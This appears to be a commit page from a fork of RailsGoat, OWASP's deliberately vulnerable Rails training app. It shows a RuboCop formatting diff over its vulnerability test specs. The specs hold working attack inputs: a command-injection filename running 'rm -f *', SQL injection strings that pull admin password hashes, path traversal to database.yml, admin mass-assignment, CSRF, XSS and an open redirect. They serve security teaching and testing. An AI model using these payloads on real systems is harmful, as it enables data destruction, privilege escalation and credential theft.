team-alpha/railsgoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

chore(rubocop): giganto rubocop commit.

Browse Source 
muahahahah
This commit is contained in:
Joseph Mastey
2017-12-05 18:46:21 -06:00
parent 284cd8811c
commit 9902345291
120 changed files with 743 additions and 635 deletions
Download Patch File Download Diff File Expand all files Collapse all files
spec/vulnerabilities/broken_auth_spec.rb
+17 -16
View File
@@ -1,34 +1,35 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'broken_auth' do
feature "broken_auth" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "one\nTutorial: https://github.com/OWASP/railsgoat/wiki/A2-Credential-Enumeration" do
visit '/'
within('.signup') do
fill_in 'email', :with => @normal_user.email + 'not'
fill_in 'password', :with => @normal_user.clear_password
visit "/"
within(".signup") do
fill_in "email", with: @normal_user.email + "not"
fill_in "password", with: @normal_user.clear_password
end
within('.actions') do
click_on 'Login'
within(".actions") do
click_on "Login"
end
pending if verifying_fixed?
expect(find('div#flash_notice').text).to eq("#{@normal_user.email}not doesn't exist!")
expect(find("div#flash_notice").text).to eq("#{@normal_user.email}not doesn't exist!")
end
scenario "two\nTutorial: https://github.com/OWASP/railsgoat/wiki/A2-Credential-Enumeration" do
visit '/'
within('.signup') do
fill_in 'email', :with => @normal_user.email
fill_in 'password', :with => @normal_user.clear_password + 'not'
visit "/"
within(".signup") do
fill_in "email", with: @normal_user.email
fill_in "password", with: @normal_user.clear_password + "not"
end
within('.actions') do
click_on 'Login'
within(".actions") do
click_on "Login"
end
pending if verifying_fixed?
expect(find('div#flash_notice').text).to eq('Incorrect Password!')
expect(find("div#flash_notice").text).to eq("Incorrect Password!")
end
end
spec/vulnerabilities/command_injection_spec.rb
+14 -13
View File
@@ -1,29 +1,30 @@
require 'spec_helper'
require 'tmpdir'
# frozen_string_literal: true
require "spec_helper"
require "tmpdir"
feature 'command injection' do
feature "command injection" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-Command-Injection", :js => true do
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-Command-Injection", js: true do
login @normal_user
legit_file = File.join(Rails.root, 'public', 'data', 'legit.txt')
File.open(legit_file, 'w') { |f| f.puts 'totes legit' }
legit_file = File.join(Rails.root, "public", "data", "legit.txt")
File.open(legit_file, "w") { |f| f.puts "totes legit" }
visit "/users/#{@normal_user.user_id}/benefit_forms"
Dir.mktmpdir do |dir|
hackety_file = File.join(dir, 'test; cd public && cd data && rm -f * ;')
File.open(hackety_file, 'w') { |f| f.print 'mwahaha' }
within('.new_benefits') do
attach_file 'benefits_upload', hackety_file
find(:xpath, "//input[@id='benefits_backup']", :visible => false).set 'true'
hackety_file = File.join(dir, "test; cd public && cd data && rm -f * ;")
File.open(hackety_file, "w") { |f| f.print "mwahaha" }
within(".new_benefits") do
attach_file "benefits_upload", hackety_file
find(:xpath, "//input[@id='benefits_backup']", visible: false).set "true"
end
click_on 'Start Upload'
click_on "Start Upload"
end
pending if verifying_fixed?
expect(File.exists?(legit_file)).to be_falsey
expect(File.exist?(legit_file)).to be_falsey
end
end
spec/vulnerabilities/csrf_spec.rb
+11 -10
View File
@@ -1,23 +1,24 @@
require 'spec_helper'
require 'tmpdir'
# frozen_string_literal: true
require "spec_helper"
require "tmpdir"
feature 'csrf' do
feature "csrf" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/R5-A8-CSRF", :js => true do
visit '/'
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/R5-A8-CSRF", js: true do
visit "/"
# TODO: is there a way to get this without visiting root first?
base_url = current_url
login @normal_user
Dir.mktmpdir do |dir|
hackety_file = File.join(dir, 'form.on.bad.guy.site.html')
hackety_file = File.join(dir, "form.on.bad.guy.site.html")
post_url = "#{base_url}schedule.json"
File.open(hackety_file, 'w') do |f|
File.open(hackety_file, "w") do |f|
f.print <<-HTML
<html>
<body>
@@ -34,12 +35,12 @@ feature 'csrf' do
end
page.driver.visit "file://#{hackety_file}"
within('#submit_me') do
click_on 'Submit request'
within("#submit_me") do
click_on "Submit request"
end
end
pending if verifying_fixed?
expect(@normal_user.reload.paid_time_off.schedule.last.event_name).to eq('Bad Guy')
expect(@normal_user.reload.paid_time_off.schedule.last.event_name).to eq("Bad Guy")
end
end
spec/vulnerabilities/insecure_dor_spec.rb
+10 -9
View File
@@ -1,32 +1,33 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'insecure direct object reference' do
feature "insecure direct object reference" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario 'attack one' do
scenario "attack one" do
login(@normal_user)
visit "/users/#{@normal_user.user_id}/benefit_forms"
download_url = first('.widget-body a')[:href]
visit download_url.sub(/name=(.*?)&/, 'name=config/database.yml&')
download_url = first(".widget-body a")[:href]
visit download_url.sub(/name=(.*?)&/, "name=config/database.yml&")
pending if verifying_fixed?
expect(page.status_code).to eq(200)
expect(page.response_headers['Content-Disposition']).to include('database.yml')
expect(page.response_headers['Content-Length']).to eq('710')
expect(page.response_headers["Content-Disposition"]).to include("database.yml")
expect(page.response_headers["Content-Length"]).to eq("710")
end
scenario "attack two\nTutorial: https://github.com/OWASP/railsgoat/wiki/A4-Insecure-Direct-Object-Reference" do
login(@normal_user)
expect(@normal_user.user_id).not_to eq(2)
visit '/users/2/work_info'
visit "/users/2/work_info"
pending if verifying_fixed?
expect(first('td').text).to eq('Joseph Mastey')
expect(first("td").text).to eq("Joseph Mastey")
end
end
spec/vulnerabilities/mass_assignment_spec.rb
+17 -16
View File
@@ -1,37 +1,38 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'mass assignment' do
feature "mass assignment" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario 'attack one' do
scenario "attack one" do
expect(@normal_user.admin).to be_falsey
login(@normal_user)
params = {:user => {:admin => 't',
:user_id => @normal_user.user_id,
:password => @normal_user.clear_password,
:password_confirmation => @normal_user.clear_password}}
params = {user: {admin: "t",
user_id: @normal_user.user_id,
password: @normal_user.clear_password,
password_confirmation: @normal_user.clear_password}}
page.driver.put "/users/#{@normal_user.user_id}.json", params
pending if verifying_fixed?
expect(@normal_user.reload.admin).to be_truthy
end
scenario 'attack two, Tutorial: https://github.com/OWASP/railsgoat/wiki/R5-Extras-Mass-Assignment-Admin-Role' do
params = {:user => {:admin => 't',
:email => 'hackety@h4x0rs.c0m',
:first_name => 'hackety',
:last_name => 'hax',
:password => 'foobarewe',
:password_confirmation => 'foobarewe'}}
page.driver.post '/users', params
scenario "attack two, Tutorial: https://github.com/OWASP/railsgoat/wiki/R5-Extras-Mass-Assignment-Admin-Role" do
params = {user: {admin: "t",
email: "hackety@h4x0rs.c0m",
first_name: "hackety",
last_name: "hax",
password: "foobarewe",
password_confirmation: "foobarewe"}}
page.driver.post "/users", params
pending if verifying_fixed?
expect(User.last.email).to eq('hackety@h4x0rs.c0m')
expect(User.last.email).to eq("hackety@h4x0rs.c0m")
expect(User.last.admin).to be_truthy
end
end
spec/vulnerabilities/password_complexity_spec.rb
+12 -11
View File
@@ -1,22 +1,23 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'password complexity' do
feature "password complexity" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "one\nTutorial: https://github.com/OWASP/railsgoat/wiki/A2-Lack-of-Password-Complexity" do
visit '/signup'
within('.signup') do
fill_in 'user_email', :with => @normal_user.email + 'not'
fill_in 'user_first_name', :with => @normal_user.first_name
fill_in 'user_last_name', :with => @normal_user.last_name + 'not'
fill_in 'user_password', :with => 'password'
fill_in 'user_password_confirmation', :with => 'password'
visit "/signup"
within(".signup") do
fill_in "user_email", with: @normal_user.email + "not"
fill_in "user_first_name", with: @normal_user.first_name
fill_in "user_last_name", with: @normal_user.last_name + "not"
fill_in "user_password", with: "password"
fill_in "user_password_confirmation", with: "password"
end
click_on 'Submit'
click_on "Submit"
pending if verifying_fixed?
expect(current_path).to eq('/dashboard/home')
expect(current_path).to eq("/dashboard/home")
end
end
spec/vulnerabilities/password_hashing_spec.rb
+4 -3
View File
@@ -1,13 +1,14 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'improper password hashing' do
feature "improper password hashing" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "with just md5\nTutorial: https://github.com/OWASP/railsgoat/wiki/A6-Sensitive-Data-Exposure-Insecure-Password-Storage" do
new_pass = 'testPassw0rd!'
new_pass = "testPassw0rd!"
@normal_user.password = new_pass
@normal_user.password_confirmation = new_pass
@normal_user.save
spec/vulnerabilities/sensitive_data_exposure.rb
+5 -4
View File
@@ -1,10 +1,11 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'sensitive data exposure' do
feature "sensitive data exposure" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
@normal_user.work_info.update_attribute(:SSN, '999-99-9999')
@normal_user.work_info.update_attribute(:SSN, "999-99-9999")
end
# this won't work with javascript_driver, as it'll apply the javascript
@@ -14,6 +15,6 @@ feature 'sensitive data exposure' do
visit "/users/#{@normal_user.user_id}/work_info"
pending if verifying_fixed?
expect(page.source).to include '999-99-9999'
expect(page.source).to include "999-99-9999"
end
end
spec/vulnerabilities/sql_injection_spec.rb
+12 -11
View File
@@ -1,6 +1,7 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'sql injection' do
feature "sql injection" do
before(:each) do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
@@ -13,19 +14,19 @@ feature 'sql injection' do
login(@normal_user)
visit "/users/#{@normal_user.user_id}/account_settings"
within('#account_edit') do
fill_in 'Email', :with => 'joe.admin@schmoe.com'
fill_in 'user_password', :with => 'H4cketyhack'
fill_in 'user_password_confirmation', :with => 'H4cketyhack'
within("#account_edit") do
fill_in "Email", with: "joe.admin@schmoe.com"
fill_in "user_password", with: "H4cketyhack"
fill_in "user_password_confirmation", with: "H4cketyhack"
# this is a hidden field, so cannot use fill_in to access it.
find(:xpath, "//input[@id='user_user_id']", :visible => false).set "8' OR admin='t') --"
find(:xpath, "//input[@id='user_user_id']", visible: false).set "8' OR admin='t') --"
end
click_on 'Submit'
click_on "Submit"
pending if verifying_fixed?
@admin_user = User.where("admin='t'").first
expect(@admin_user.email).to eq('joe.admin@schmoe.com')
expect(@admin_user.email).to eq("joe.admin@schmoe.com")
expect(@admin_user.admin).to eq(true)
end
@@ -35,8 +36,8 @@ feature 'sql injection' do
visit "/admin/1/analytics"
within('#analytics_search') do
fill_in 'ip', :with => '::1'
within("#analytics_search") do
fill_in "ip", with: "::1"
check "field_user_agent"
payload = "(select group_concat(password) from users where admin='t')"
spec/vulnerabilities/unvalidated_redirects_spec.rb
+11 -10
View File
@@ -1,21 +1,22 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'unvalidated redirect' do
feature "unvalidated redirect" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A10-Unvalidated-Redirects-and-Forwards-(redirect_to)", :js => true do
visit '/?url=http://example.com/do/evil/things'
within('.signup') do
fill_in 'email', :with => @normal_user.email
fill_in 'password', :with => @normal_user.clear_password
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A10-Unvalidated-Redirects-and-Forwards-(redirect_to)", js: true do
visit "/?url=http://example.com/do/evil/things"
within(".signup") do
fill_in "email", with: @normal_user.email
fill_in "password", with: @normal_user.clear_password
end
within('.actions') do
click_on 'Login'
within(".actions") do
click_on "Login"
end
pending if verifying_fixed?
expect(current_url).to eq('http://example.com/do/evil/things')
expect(current_url).to eq("http://example.com/do/evil/things")
end
end
spec/vulnerabilities/url_access_spec.rb
+6 -5
View File
@@ -1,16 +1,17 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'url access' do
feature "url access" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A7-Missing-Function-Level-Access-Control--(Admin-Controller)", :js => true do
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A7-Missing-Function-Level-Access-Control--(Admin-Controller)", js: true do
login @normal_user
visit '/admin/1/dashboard'
visit "/admin/1/dashboard"
pending if verifying_fixed?
expect(current_path).to eq('/admin/1/dashboard')
expect(current_path).to eq("/admin/1/dashboard")
end
end
spec/vulnerabilities/xss_spec.rb
+10 -9
View File
@@ -1,30 +1,31 @@
require 'spec_helper'
# frozen_string_literal: true
require "spec_helper"
feature 'xss' do
feature "xss" do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A3-Cross-Site-Scripting", :js => true do
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A3-Cross-Site-Scripting", js: true do
login @normal_user
visit "/users/#{@normal_user.user_id}/account_settings"
within('#account_edit') do
fill_in 'First name', :with => "<script>$(function() { $('div input.btn').val('RailsGoat h4x0r3d') } )</script>"
within("#account_edit") do
fill_in "First name", with: "<script>$(function() { $('div input.btn').val('RailsGoat h4x0r3d') } )</script>"
# password gets screwed up if you don't re-submit - need to fix
fill_in 'user_password', :with => @normal_user.clear_password
fill_in 'user_password_confirmation', :with => @normal_user.clear_password
fill_in "user_password", with: @normal_user.clear_password
fill_in "user_password_confirmation", with: @normal_user.clear_password
end
click_on 'Submit'
click_on "Submit"
sleep(1)
visit "/users/#{@normal_user.user_id}/account_settings"
pending if verifying_fixed?
expect(find('#submit_button').value).to eq('RailsGoat h4x0r3d')
expect(find("#submit_button").value).to eq("RailsGoat h4x0r3d")
# might be nice to demonstrate posting cookie contents or somesuch, but
# this at least shows the vulnerability still exists.